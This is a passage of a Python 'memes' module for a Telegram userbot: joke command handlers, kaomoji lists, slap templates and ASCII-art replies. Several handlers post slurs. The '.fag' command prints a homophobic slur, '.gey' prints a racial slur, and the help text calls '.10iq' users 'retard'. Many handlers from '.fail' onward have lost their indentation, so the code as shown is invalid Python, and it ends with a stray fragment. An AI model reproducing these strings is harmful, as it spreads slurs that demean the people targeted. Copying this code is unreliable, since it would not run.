"Hello, who's there, I'm talking.",
"You know who this is.",
"Yo!",
"Whaddup.",
"Greetings and salutations!",
"Hello, sunshine!",
"Hey, howdy, hi!",
"What’s kickin’, little chicken?",
"Peek-a-boo!",
"Howdy-doody!",
"Hey there, freshman!",
"I come in peace!",
"Ahoy, matey!",
"Hiya!",
]
SHGS = [
"┐(´д`)┌",
"┐(´~`)┌",
"┐(´ー`)┌",
"┐( ̄ヘ ̄)┌",
"╮(╯∀╰)╭",
"╮(╯_╰)╭",
"┐(´д`)┌",
"┐(´∀`)┌",
"ʅ(́◡◝)ʃ",
"┐(゚~゚)┌",
"┐('д')┌",
"┐(‘~`;)┌",
"ヘ(´-`;)ヘ",
"┐( -“-)┌",
"ʅ(´◔౪◔)ʃ",
"ヽ(゜~゜o)ノ",
"ヽ(~~~ )ノ",
"┐(~ー~;)┌",
"┐(-。ー;)┌",
r"¯\_(ツ)_/¯",
r"¯\_(⊙_ʖ⊙)_/¯",
r"¯\_༼ ಥ ‿ ಥ ༽_/¯",
"乁( ⁰͡ Ĺ̯ ⁰͡ ) ㄏ",
]
CRI = [
"أ‿أ",
"╥﹏╥",
"(;﹏;)",
"(ToT)",
"(┳Д┳)",
"(ಥ﹏ಥ)",
"(;へ:)",
"(T_T)",
"(πーπ)",
"(T▽T)",
"(⋟﹏⋞)",
"(iДi)",
"(´Д⊂ヽ",
"(;Д;)",
"(>﹏<)",
"(TдT)",
"(つ﹏⊂)",
"༼☯﹏☯༽",
"(ノ﹏ヽ)",
"(ノAヽ)",
"(╥_╥)",
"(T⌓T)",
"(༎ຶ⌑༎ຶ)",
"(☍﹏⁰)。",
"(ಥ_ʖಥ)",
"(つд⊂)",
"(≖͞_≖̥)",
"(இ﹏இ`。)",
"༼ಢ_ಢ༽",
"༼ ༎ຶ ෴ ༎ຶ༽",
]
# Sentence templates for the .slap command; slap() fills the placeholders
# with a random item/verb/location.  NOTE: the original list was missing a
# comma after the "ties {victim} to a pole..." entry, which silently
# concatenated it with the following template into one garbled sentence.
SLAP_TEMPLATES = [
    "{hits} {victim} with a {item}.",
    "{hits} {victim} in the face with a {item}.",
    "{hits} {victim} around a bit with a {item}.",
    "{throws} a {item} at {victim}.",
    "grabs a {item} and {throws} it at {victim}'s face.",
    "{hits} a {item} at {victim}.",
    "{throws} a few {item} at {victim}.",
    "grabs a {item} and {throws} it in {victim}'s face.",
    "launches a {item} in {victim}'s general direction.",
    "sits on {victim}'s face while slamming a {item} {where}.",
    "starts slapping {victim} silly with a {item}.",
    "pins {victim} down and repeatedly {hits} them with a {item}.",
    "grabs up a {item} and {hits} {victim} with it.",
    "starts slapping {victim} silly with a {item}.",
    "holds {victim} down and repeatedly {hits} them with a {item}.",
    "prods {victim} with a {item}.",
    "picks up a {item} and {hits} {victim} with it.",
    "ties {victim} to a chair and {throws} a {item} at them.",
    "{hits} {victim} {where} with a {item}.",
    "ties {victim} to a pole and whips them {where} with a {item}.",
    "gave a friendly push to help {victim} learn to swim in lava.",
    "sent {victim} to /dev/null.",
    "sent {victim} down the memory hole.",
    "beheaded {victim}.",
    "threw {victim} off a building.",
    "replaced all of {victim}'s music with Nickelback.",
    "spammed {victim}'s email.",
    "made {victim} a knuckle sandwich.",
    "slapped {victim} with pure nothing.",
    "hit {victim} with a small, interstellar spaceship.",
    "quickscoped {victim}.",
    "put {victim} in check-mate.",
    "RSA-encrypted {victim} and deleted the private key.",
    "put {victim} in the friendzone.",
    "slaps {victim} with a DMCA takedown request!",
]
ITEMS = [
"cast iron skillet",
"large trout",
"baseball bat",
"cricket bat",
"wooden cane",
"nail",
"printer",
"shovel",
"pair of trousers",
"CRT monitor",
"diamond sword",
"baguette",
"physics textbook",
"toaster",
"portrait of Richard Stallman",
"television",
"mau5head",
"five ton truck",
"roll of duct tape",
"book",
"laptop",
"old television",
"sack of rocks",
"rainbow trout",
"cobblestone block",
"lava bucket",
"rubber chicken",
"spiked bat",
"gold block",
"fire extinguisher",
"heavy rock",
"chunk of dirt",
"beehive",
"piece of rotten meat",
"bear",
"ton of bricks",
]
THROW = [
"throws",
"flings",
"chucks",
"hurls",
]
HIT = [
"hits",
"whacks",
"slaps",
"smacks",
"bashes",
]
WHERE = ["in the chest", "on the head", "on the butt", "on the crotch"]
# ===========================================
@register(outgoing=True, pattern=r"^.(\w+)say (.*)")
async def univsaye(cowmsg):
    """ For .cowsay module, userbot wrapper for cow which says things. """
    arg = cowmsg.pattern_match.group(1).lower()
    text = cowmsg.pattern_match.group(2)
    if arg == "cow":
        arg = "default"
    if arg not in cow.COWACTERS:
        return
    cheese = cow.get_cow(arg)
    cheese = cheese()
    # Escape backticks so the ASCII art survives Telegram's monospace
    # markdown.  The original nested double quotes inside a double-quoted
    # f-string, which is a SyntaxError on Python < 3.12.
    milked = cheese.milk(text).replace("`", "´")
    await cowmsg.edit(f"`{milked}`")
@register(outgoing=True, pattern="^:/$", ignore_unsafe=True)
async def kek(keks):
    """ Check yourself ;) — animate :/ by flipping the slash. """
    uio = ["/", "\\"]
    for i in range(1, 15):
        # The original called time.sleep(), which blocks the whole event
        # loop inside an async handler; use the asyncio sleep that this
        # module already imports.
        await sleep(0.3)
        await keks.edit(":" + uio[i % 2])
@register(outgoing=True, pattern=r"^.coinflip (.*)")
async def coin(event):
    """ Flip a coin; if the caller guessed a side, tell them how they did. """
    outcome = choice(["heads", "tails"])
    side = outcome.capitalize()
    guess = event.pattern_match.group(1)
    guess = guess.lower() if guess else guess
    base = f"The coin landed on: **{side}**."
    if guess == outcome:
        # Correct guess.
        await event.edit(base + "\nYou were correct.")
    elif guess in ("heads", "tails"):
        # Valid guess, but the other side came up.
        await event.edit(base + "\nYou weren't correct, try again ...")
    else:
        # No (or unrecognised) guess: just report the flip.
        await event.edit(base)
@register(pattern="^.slap(?: |$)(.*)", outgoing=True)
async def who(event):
    """ slaps a user, or get slapped if not a reply. """
    # Resolve the target from the reply/argument; the helper returns a
    # tuple whose first element is the user object.
    replied_user = await get_user_from_event(event)
    if replied_user:
        replied_user = replied_user[0]
    else:
        # Helper could not resolve a user (it reports the error itself).
        return
    caption = await slap(replied_user, event)
    try:
        await event.edit(caption)
    except BaseException:
        # Editing can fail (e.g. markdown/entity issues); show a fallback.
        await event.edit(
            "`Can't slap this person, need to fetch some sticks and stones !!`"
        )
async def slap(replied_user, event):
    """ Build a random slap sentence for the given target user. """
    target_id = replied_user.id
    target_name = replied_user.first_name
    target_username = replied_user.username
    # Mention by @username when available, otherwise by an inline
    # tg://user link to the first name.
    if target_username:
        slapped = f"@{target_username}"
    else:
        slapped = f"[{target_name}](tg://user?id={target_id})"
    # Keep the choice() call order (template, item, hit, throw, where)
    # identical to the original.
    template = choice(SLAP_TEMPLATES)
    return "..." + template.format(
        victim=slapped,
        item=choice(ITEMS),
        hits=choice(HIT),
        throws=choice(THROW),
        where=choice(WHERE),
    )
@register(outgoing=True, pattern="^-_-$", ignore_unsafe=True)
async def lol(lel):
    """ Ok... (stretches the -_- face one underscore at a time) """
    face = "-_-"
    for _ in range(10):
        # Swap the trailing '-' for '_-' so the face keeps growing.
        face = face[:-1] + "_-"
        await lel.edit(face)
@register(outgoing=True, pattern="^.(yes|no|maybe|decide)$")
async def decide(event):
    """ Ask yesno.wtf for a (possibly forced) yes/no/maybe gif answer. """
    decision = event.pattern_match.group(1).lower()
    message_id = event.reply_to_msg_id if event.reply_to_msg_id else None
    # .decide lets the API pick; the other commands force that answer.
    # (The original duplicated the request and used an f-string with no
    # placeholder for the unforced branch.)
    params = {} if decision == "decide" else {"force": decision}
    r = requests.get("https://yesno.wtf/api", params=params).json()
    await event.delete()
    await event.client.send_message(event.chat_id,
                                    str(r["answer"]).upper(),
                                    reply_to=message_id,
                                    file=r["image"])
@register(outgoing=True, pattern="^;_;$", ignore_unsafe=True)
async def fun(e):
    """ Like -_- but crying: grow the ;_; face underscore by underscore. """
    face = ";_;"
    for _ in range(10):
        face = face[:-1] + "_;"
        await e.edit(face)
@register(outgoing=True, pattern="^.fp$")
async def facepalm(e):
    """ Facepalm 🤦‍♂ — replace the triggering .fp with the emoji. """
    await e.edit("🤦‍♂")
@register(outgoing=True, pattern="^.cry$")
async def cry(e):
    """ y u du dis, i cry everytime !! """
    # Replace the triggering .cry with a random crying kaomoji.
    await e.edit(choice(CRI))
@register(outgoing=True, pattern="^.insult$")
async def insult(e):
    """ I make you cry !! """
    # Replace the triggering .insult with a random insult line.
    await e.edit(choice(INSULT_STRINGS))
@register(outgoing=True, pattern="^.cp(?: |$)(.*)")
async def copypasta(cp_e):
    """ Copypasta the famous meme """
    # Text comes from the argument, or from the replied-to message.
    textx = await cp_e.get_reply_message()
    message = cp_e.pattern_match.group(1)
    if message:
        pass
    elif textx:
        message = textx.text
    else:
        await cp_e.edit("`😂🅱️IvE👐sOME👅text👅for✌️Me👌tO👐MAkE👀iT💞funNy!💦`")
        return
    reply_text = choice(EMOJIS)
    # choose a random character in the message to be substituted with 🅱️
    b_char = choice(message).lower()
    for owo in message:
        if owo == " ":
            # Spaces become random emojis.
            reply_text += choice(EMOJIS)
        elif owo in EMOJIS:
            # Existing emojis are kept and doubled up with a random one.
            reply_text += owo
            reply_text += choice(EMOJIS)
        elif owo.lower() == b_char:
            reply_text += "🅱️"
        else:
            # Randomize the case of every other character.
            if bool(getrandbits(1)):
                reply_text += owo.upper()
            else:
                reply_text += owo.lower()
        reply_text += choice(EMOJIS)
    await cp_e.edit(reply_text)
@register(outgoing=True, pattern="^.vapor(?: |$)(.*)")
async def vapor(vpr):
    """ Vaporize everything! (map printable ASCII to fullwidth forms) """
    reply_text = list()
    textx = await vpr.get_reply_message()
    message = vpr.pattern_match.group(1)
    if message:
        pass
    elif textx:
        message = textx.text
    else:
        await vpr.edit("`Give some text for vapor!`")
        return
    for charac in message:
        # Fullwidth forms exist for the printable range 0x21-0x7E; the
        # original also shifted 0x7F (DEL), producing a code point that is
        # not a fullwidth character.
        if 0x21 <= ord(charac) <= 0x7E:
            reply_text.append(chr(ord(charac) + 0xFEE0))
        elif ord(charac) == 0x20:
            # ASCII space maps to the ideographic space U+3000.
            reply_text.append(chr(0x3000))
        else:
            reply_text.append(charac)
    await vpr.edit("".join(reply_text))
@register(outgoing=True, pattern="^.str(?: |$)(.*)")
async def stretch(stret):
    """ Stretch it: repeat every vowel a random 3-10 times. """
    textx = await stret.get_reply_message()
    # The original assigned stret.text here only to overwrite it on the
    # very next line; use the captured group directly.
    message = stret.pattern_match.group(1)
    if message:
        pass
    elif textx:
        message = textx.text
    else:
        await stret.edit("`GiiiiiiiB sooooooomeeeeeee teeeeeeext!`")
        return
    count = randint(3, 10)
    reply_text = sub(r"([aeiouAEIOUaeiouAEIOUаеиоуюяыэё])", (r"\1" * count),
                     message)
    await stret.edit(reply_text)
@register(outgoing=True, pattern="^.zal(?: |$)(.*)")
async def zal(zgfy):
    """ Invoke the feeling of chaos: pile zalgo combining marks on text. """
    reply_text = list()
    textx = await zgfy.get_reply_message()
    message = zgfy.pattern_match.group(1)
    if message:
        pass
    elif textx:
        message = textx.text
    else:
        await zgfy.edit(
            "`gͫ ̆ i̛ ̺ v͇̆ ȅͅ a̢ͦ s̴̪ c̸̢ ä̸ rͩͣ y͖͞ t̨͚ é̠ x̢͖ t͔͛`"
        )
        return
    for charac in message:
        if not charac.isalpha():
            reply_text.append(charac)
            continue
        for _ in range(0, 3):
            # BUG FIX: the original rebound the name `randint` to its own
            # result, making `randint` a function-local and raising
            # UnboundLocalError on the first call.  Use a separate name
            # and index the mark table directly.
            layer = randint(0, 2)
            charac = charac.strip() + choice(ZALG_LIST[layer]).strip()
        reply_text.append(charac)
    await zgfy.edit("".join(reply_text))
@register(outgoing=True, pattern="^.hi$")
async def hoi(hello):
    """ Greet everyone! """
    # Replace the triggering .hi with a random greeting.
    await hello.edit(choice(HELLOSTR))
@register(outgoing=True, pattern="^.owo(?: |$)(.*)")
async def faces(owo):
    """ UwU — translate text into 'owo speak'. """
    # Text comes from the argument, or from the replied-to message.
    textx = await owo.get_reply_message()
    message = owo.pattern_match.group(1)
    if message:
        pass
    elif textx:
        message = textx.text
    else:
        await owo.edit("` UwU no text given! `")
        return
    # r/l -> w, n+vowel -> ny+vowel, '!' runs -> a random uwu face.
    reply_text = sub(r"(r|l)", "w", message)
    reply_text = sub(r"(R|L)", "W", reply_text)
    reply_text = sub(r"n([aeiou])", r"ny\1", reply_text)
    reply_text = sub(r"N([aeiouAEIOU])", r"Ny\1", reply_text)
    reply_text = sub(r"\!+", " " + choice(UWUS), reply_text)
    reply_text = reply_text.replace("ove", "uv")
    reply_text += " " + choice(UWUS)
    await owo.edit(reply_text)
@register(outgoing=True, pattern="^.react$")
async def react_meme(react):
    """ Make your userbot react to everything. """
    # Replace the triggering .react with a random kaomoji reaction.
    await react.edit(choice(FACEREACTS))
@register(outgoing=True, pattern="^.shg$")
async def shrugger(shg):
    r""" ¯\_(ツ)_/¯ — replace .shg with a random shrug kaomoji. """
    await shg.edit(choice(SHGS))
@register(outgoing=True, pattern="^.chase$")
async def police(chase):
    """ Run boi run, i'm gonna catch you !! """
    # Replace the triggering .chase with a random chase taunt.
    await chase.edit(choice(CHASE_STR))
@register(outgoing=True, pattern="^.run$")
async def runner_lol(run):
    """ Run, run, RUNNN! """
    # Replace the triggering .run with a random running line.
    await run.edit(choice(RUNS_STR))
@register(outgoing=True, pattern="^.metoo$")
async def metoo(hahayes):
    """ Haha yes """
    # Replace the triggering .metoo with a random "me too" line.
    await hahayes.edit(choice(METOOSTR))
@register(outgoing=True, pattern="^Oof$")
async def Oof(e):
    """ Stretch an 'Oof' with ever more o's. """
    word = "Oof"
    for _ in range(15):
        word = word[:-1] + "of"
        await e.edit(word)
@register(outgoing=True, pattern="^.10iq$")
async def iqless(e):
    """ Replace the triggering .10iq with a wheelchair emoji. """
    await e.edit("♿")
@register(outgoing=True, pattern="^.fuck$")
async def iqless(e):
    """ Draw a large middle finger out of emoji. """
    # NOTE(review): this reuses the name `iqless` (defined above and below);
    # the handler still registers via the decorator, but the module-level
    # attribute is rebound each time — consider unique names.
    await e.edit("🖕🖕🖕🖕🖕🖕🖕🖕\n🖕🖕🖕🖕🖕🖕🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕🖕🖕🖕🖕\n🖕🖕🖕🖕🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕")
@register(outgoing=True, pattern="^.bye$")
async def iqless(e):
    """ Replace the triggering .bye with a farewell. """
    # NOTE(review): third redefinition of `iqless` in this module; the
    # handlers all register, but only this binding survives at module level.
    await e.edit("Kek thx bye")
@register(outgoing=True, pattern="^.moon$")
async def moon(event):
    """ Animate the phases of the moon by rotating an emoji ring. """
    frames = deque("🌗🌘🌑🌒🌓🌔🌕🌖")
    try:
        for _ in range(32):
            await sleep(0.1)
            await event.edit("".join(frames))
            frames.rotate(1)
    except BaseException:
        # The message may be deleted mid-animation; stop quietly.
        return
@register(outgoing=True, pattern="^.earth$")
async def earth(event):
    """ Animate a spinning earth by rotating an emoji ring. """
    frames = deque("🌏🌍🌎🌎🌍🌏🌍🌎")
    try:
        for _ in range(32):
            await sleep(0.1)
            await event.edit("".join(frames))
            frames.rotate(1)
    except BaseException:
        # The message may be deleted mid-animation; stop quietly.
        return
@register(outgoing=True, pattern="^.clock$")
async def clock(event):
    """ Animate ticking clock faces by rotating an emoji ring. """
    frames = deque("🕙🕘🕗🕖🕕🕔🕓🕒🕑🕐🕛")
    try:
        for _ in range(32):
            await sleep(0.1)
            await event.edit("".join(frames))
            frames.rotate(1)
    except BaseException:
        # The message may be deleted mid-animation; stop quietly.
        return
@register(outgoing=True, pattern="^.rain$")
async def rain(event):
    """ Animate changing weather by rotating an emoji ring. """
    frames = deque("☀️🌤⛅️🌥☁️🌧⛈")
    try:
        for _ in range(32):
            await sleep(0.1)
            await event.edit("".join(frames))
            frames.rotate(1)
    except BaseException:
        # The message may be deleted mid-animation; stop quietly.
        return
@register(outgoing=True, pattern="^.love$")
async def love(event):
    """ Animate a parade of heart emoji by rotating the ring. """
    frames = deque("❤️🧡💛💚💙💜🖤💕💞💓💗💖💘💝")
    try:
        for _ in range(32):
            await sleep(0.1)
            await event.edit("".join(frames))
            frames.rotate(1)
    except BaseException:
        # The message may be deleted mid-animation; stop quietly.
        return
@register(outgoing=True, pattern="^.mock(?: |$)(.*)")
async def spongemocktext(mock):
    """ Do it and find the real fun. (sPOngEBob mOCKiNg case) """
    reply_text = list()
    # Text comes from the argument, or from the replied-to message.
    textx = await mock.get_reply_message()
    message = mock.pattern_match.group(1)
    if message:
        pass
    elif textx:
        message = textx.text
    else:
        await mock.edit("`gIvE sOMEtHInG tO MoCk!`")
        return
    for charac in message:
        # Flip the case of roughly half the letters at random.
        if charac.isalpha() and randint(0, 1):
            to_app = charac.upper() if charac.islower() else charac.lower()
            reply_text.append(to_app)
        else:
            reply_text.append(charac)
    await mock.edit("".join(reply_text))
@register(outgoing=True, pattern="^.clap(?: |$)(.*)")
async def claptext(memereview):
    """ Praise people! Sprinkle clap emoji between every word. """
    textx = await memereview.get_reply_message()
    message = memereview.pattern_match.group(1)
    if not message:
        if textx:
            message = textx.text
        else:
            await memereview.edit("`Hah, I don't clap pointlessly!`")
            return
    await memereview.edit(f"👏 {message.replace(' ', ' 👏 ')} 👏")
@register(outgoing=True, pattern="^.bt$")
async def bluetext(bt_e):
    """ Believe me, you will find this useful. """
    # Only fires when used as a reply inside a group chat.
    if await bt_e.get_reply_message() and bt_e.is_group:
        await bt_e.edit(
            "/BLUETEXT /MUST /CLICK.\n"
            "/ARE /YOU /A /STUPID /ANIMAL /WHICH /IS /ATTRACTED /TO /COLOURS?")
@register(outgoing=True, pattern=r"^.f (.*)")
async def payf(event):
    """ Pay respects: draw a big F out of the given text. """
    paytext = event.pattern_match.group(1)
    # Row widths of the F glyph, top to bottom.
    widths = (8, 8, 2, 2, 2, 6, 6, 2, 2, 2, 2, 2)
    await event.edit("\n".join(paytext * w for w in widths))
@register(outgoing=True, pattern="^.lfy (.*)")
async def let_me_google_that_for_you(lmgtfy_q):
    """ Build a lmgtfy link for the query and shorten it via is.gd. """
    textx = await lmgtfy_q.get_reply_message()
    qry = lmgtfy_q.pattern_match.group(1)
    if qry:
        query = str(qry)
    elif textx:
        query = textx
        query = query.message
    else:
        # BUG FIX: the original fell through with `query` unbound and
        # crashed with NameError; report the misuse instead.
        await lmgtfy_q.edit("`Give me a query to google!`")
        return
    query_encoded = query.replace(" ", "+")
    lfy_url = f"http://lmgtfy.com/?s=g&iie=1&q={query_encoded}"
    payload = {'format': 'json', 'url': lfy_url}
    r = requests.get('http://is.gd/create.php', params=payload)
    await lmgtfy_q.edit(f"Here you are, help yourself.\
\n[{query}]({r.json()['shorturl']})")
@register(pattern=r".scam(?: |$)(.*)", outgoing=True)
async def scam(event):
    """ Just a small command to fake chat actions for fun !! """
    options = [
        'typing', 'contact', 'game', 'location', 'voice', 'round', 'video',
        'photo', 'document', 'cancel'
    ]
    input_str = event.pattern_match.group(1)
    args = input_str.split()
    if len(args) == 0:  # Let bot decide action and time
        scam_action = choice(options)
        scam_time = randint(30, 60)
    elif len(args) == 1:  # User decides time/action, bot decides the other.
        # BUG FIX: the original tried the *action* branch first, but
        # str(...).lower() can never raise ValueError, so a numeric single
        # argument was treated as an action name.  Parse the number first
        # and fall back to an action name.
        try:
            scam_time = int(args[0])
            scam_action = choice(options)
        except ValueError:
            scam_action = str(args[0]).lower()
            scam_time = randint(30, 60)
    elif len(args) == 2:  # User decides both action and time
        scam_action = str(args[0]).lower()
        scam_time = int(args[1])
    else:
        await event.edit("`Invalid Syntax !!`")
        return
    try:
        if scam_time > 0:
            # Delete the command, then hold the fake chat action open.
            await event.delete()
            async with event.client.action(event.chat_id, scam_action):
                await sleep(scam_time)
    except BaseException:
        # Best effort: the chat/action may vanish mid-way.
        return
@register(pattern=r".type(?: |$)(.*)", outgoing=True)
async def typewriter(typew):
    """ Just a small command to make your keyboard become a typewriter! """
    textx = await typew.get_reply_message()
    message = typew.pattern_match.group(1)
    if not message:
        if textx:
            message = textx.text
        else:
            await typew.edit("`Give a text to type!`")
            return
    delay = 0.03
    cursor = "|"
    typed = ""
    await typew.edit(cursor)
    await sleep(delay)
    # Reveal one character per step, alternating cursor-on / cursor-off.
    for character in message:
        typed += character
        await typew.edit(typed + cursor)
        await sleep(delay)
        await typew.edit(typed)
        await sleep(delay)
@register(outgoing=True, pattern="^.leave$")
async def leave(e):
    """ Replace .leave with a mock 'leaving' message. """
    # Guard mirrors the other art commands: skip bot-command-like prefixes.
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("`You must Leaving dis Group kek!`")
@register(outgoing=True, pattern="^.fail$")
async def fail(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ `"
"`\n████▌▄▌▄▐▐▌█████ `"
"`\n████▌▄▌▄▐▐▌▀████ `"
"`\n▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ `")
@register(outgoing=True, pattern="^.lol$")
async def lol(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n╱┏┓╱╱╱╭━━━╮┏┓╱╱╱╱ `"
"`\n╱┃┃╱╱╱┃╭━╮┃┃┃╱╱╱╱ `"
"`\n╱┃┗━━┓┃╰━╯┃┃┗━━┓╱ `"
"`\n╱┗━━━┛╰━━━╯┗━━━┛╱ `")
@register(outgoing=True, pattern="^.lool$")
async def lool(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n╭╭━━━╮╮┈┈┈┈┈┈┈┈┈┈\n┈┃╭━━╯┈┈┈┈▕╲▂▂╱▏┈\n┈┃┃╱▔▔▔▔▔▔▔▏╱▋▋╮┈`"
"`\n┈┃╰▏┃╱╭╮┃╱╱▏╱╱▆┃┈\n┈╰━▏┗━╰╯┗━╱╱╱╰┻┫┈\n┈┈┈▏┏┳━━━━▏┏┳━━╯┈`"
"`\n┈┈┈▏┃┃┈┈┈┈▏┃┃┈┈┈┈ `")
@register(outgoing=True, pattern="^.stfu$")
async def stfu(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n██████████████████████████████`"
"`\n██▀▀▀▀████▀▀▀▀████▀▀▀▀▀███▀▀██▀▀█`"
"`\n█──────██──────██───────██──██──█`"
"`\n█──██▄▄████──████──███▄▄██──██──█`"
"`\n█▄────▀████──████────█████──██──█`"
"`\n█▀▀██──████──████──███████──██──█`"
"`\n█──────████──████──███████──────█`"
"`\n██▄▄▄▄█████▄▄████▄▄████████▄▄▄▄██`"
"`\n█████████████████████████████████`")
@register(outgoing=True, pattern="^.gtfo$")
async def gtfo(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n███████████████████████████████ `"
"`\n█▀▀▀▀▀▀▀█▀▀▀▀▀▀█▀▀▀▀▀▀▀█▀▀▀▀▀▀█ `"
"`\n█───────█──────█───────█──────█ `"
"`\n█──███──███──███──███▄▄█──██──█ `"
"`\n█──███▄▄███──███─────███──██──█ `"
"`\n█──██───███──███──██████──██──█ `"
"`\n█──▀▀▀──███──███──██████──────█ `"
"`\n█▄▄▄▄▄▄▄███▄▄███▄▄██████▄▄▄▄▄▄█ `"
"`\n███████████████████████████████ `")
@register(outgoing=True, pattern="^.nih$")
async def nih(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n(\_/)`"
"`\n(•_•)`"
"`\n >🌹 *ini buat kamu`"
"`\n `"
"`\n(\_/)`"
"`\n(•_•)`"
"`\n🌹<\ *tapi boong`")
@register(outgoing=True, pattern="^.fag$")
async def gtfo(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n█████████`"
"`\n█▄█████▄█`"
"`\n█▼▼▼▼▼`"
"`\n█ STFU FAGGOT'S`"
"`\n█▲▲▲▲▲`"
"`\n█████████`"
"`\n ██ ██`")
@register(outgoing=True, pattern="^.taco$")
async def taco(e):
    """ Replace .taco with a taco-offering bunny. """
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("\n{\__/}"
                     "\n(●_●)"
                     "\n( >🌮 Want a taco?")
@register(outgoing=True, pattern="^.paw$")
async def paw(e):
    """ Replace .paw with a cat face kaomoji. """
    # NOTE(review): the opening backtick is never closed — probably meant
    # "`(=ↀωↀ=)`"; left as-is since it is a runtime string.
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("`(=ↀωↀ=)")
@register(outgoing=True, pattern="^.tf$")
async def tf(e):
    """ Replace .tf with a 'what the...' kaomoji. """
    if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("(̿▀̿ ̿Ĺ̯̿̿▀̿ ̿)̄ ")
@register(outgoing=True, pattern="^.gey$")
async def gey(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n┈┈┈╭━━━━━╮┈┈┈┈┈\n┈┈┈┃┊┊┊┊┊┃┈┈┈┈┈`"
"`\n┈┈┈┃┊┊╭━╮┻╮┈┈┈┈\n┈┈┈╱╲┊┃▋┃▋┃┈┈┈┈\n┈┈╭┻┊┊╰━┻━╮┈┈┈┈`"
"`\n┈┈╰┳┊╭━━━┳╯┈┈┈┈\n┈┈┈┃┊┃╰━━┫┈NIGGA U GEY`"
"\n┈┈┈┈┈┈┏━┓┈┈┈┈┈┈")
@register(outgoing=True, pattern="^.gay$")
async def gey(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n┈┈┈╭━━━━━╮┈┈┈┈┈\n┈┈┈┃┊┊┊┊┊┃┈┈┈┈┈`"
"`\n┈┈┈┃┊┊╭━╮┻╮┈┈┈┈\n┈┈┈╱╲┊┃▋┃▋┃┈┈┈┈\n┈┈╭┻┊┊╰━┻━╮┈┈┈┈`"
"`\n┈┈╰┳┊╭━━━┳╯┈┈┈┈\n┈┈┈┃┊┃╰━━┫┈BAPAQ U GAY`"
"\n┈┈┈┈┈┈┏━┓┈┈┈┈┈┈")
@register(outgoing=True, pattern="^.bot$")
async def bot(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("` \n ╲╲╭━━━━╮ \n╭╮┃▆┈┈▆┃╭╮ \n┃╰┫▽▽▽┣╯┃ \n╰━┫△△△┣━╯`"
"`\n╲╲┃┈┈┈┈┃ \n╲╲┃┈┏┓┈┃ `")
@register(outgoing=True, pattern="^.hey$")
async def hey(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("\n┈┈┈╱▔▔▔▔╲┈╭━━━━━\n┈┈▕▂▂▂▂▂▂▏┃HEY!┊😀`"
"`\n┈┈▕▔▇▔▔┳▔▏╰┳╮HEY!┊\n┈┈▕╭━╰╯━╮▏━╯╰━━━\n╱▔▔▏▅▅▅▅▕▔▔╲┈┈┈┈`"
"`\n▏┈┈╲▂▂▂▂╱┈┈┈▏┈┈┈`")
@register(outgoing=True, pattern="^.nou$")
async def nou(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n┈╭╮╭╮\n┈┃┃┃┃\n╭┻┗┻┗╮`"
"`\n┃┈▋┈▋┃\n┃┈╭▋━╮━╮\n┃┈┈╭╰╯╰╯╮`"
"`\n┫┈┈ NoU\n┃┈╰╰━━━━╯`"
"`\n┗━━┻━┛`")
CMD_HELP.update({
"memes":
".cowsay\
\nUsage: cow which says things.\
\n\n:/\
\nUsage: Check yourself ;)\
\n\n-_-\
\nUsage: Ok...\
\n\n;_;\
\nUsage: Like `-_-` but crying.\
\n\n.cp\
\nUsage: Copypasta the famous meme\
\n\n.vapor\
\nUsage: Vaporize everything!\
\n\n.str\
\nUsage: Stretch it.\
\n\n.10iq\
\nUsage: You retard !!\
\n\n.zal\
\nUsage: Invoke the feeling of chaos.\
\n\nOof\
\nUsage: Ooooof\
\n\n.fp\
\nUsage: Facepalm :P\
\n\n.moon\
\nUsage: kensar moon animation.\
\n\n.clock\
\nUsage: kensar clock animation.\
\n\n.hi\
\nUsage: Greet everyone!\
\n\n.coinflip <heads/tails>\
\nUsage: Flip a coin !!\
\n\n.owo\
\nUsage: UwU\
\n\n.react\
\nUsage: Make your userbot react to everything.\
\n\n.slap\
\nUsage: reply to slap them with random objects !!\
\n\n.cry\
\nUsage: y u du dis, i cri.\
\n\n.shg\
\nUsage: Shrug at it !!\
\n\n.run\
\nUsage: Let Me Run, run, RUNNN!\
\n\n.chase\
\nUsage: You better start running\
\n\n.metoo\
\nUsage: Haha yes\
\n\n.mock\
\nUsage: Do it and find the real fun.\
\n\n.clap\
\nUsage: Praise people!\
\n\n.f <emoji/character>\
\nUsage: Pay Respects.\
\n\n.bt\
\nUsage: Believe me, you will find this useful.\
\n\n.type\
\nUsage: Just a small command to make your keyboard become a typewriter!\
\n\n.lfy <query>\
\nUsage: Let me Google that for you real quick !!\
\n\n.decide [Alternates: (.yes, .no, .maybe)]\
\nUsage: Make a quick decision.\
\n\n.scam <action> <time>\
\n[Available Actions: (typing, contact, game, location, voice, round, video, photo, document, cancel)]\
\nUsage: Create fake chat actions, for fun. (Default action: typing)\
\n\n\nThanks to 🅱️ottom🅱️ext🅱️ot (@NotAMemeBot) for some of these."
})
| # Copyright (C) 2019 The Raphielscape Company LLC.
#
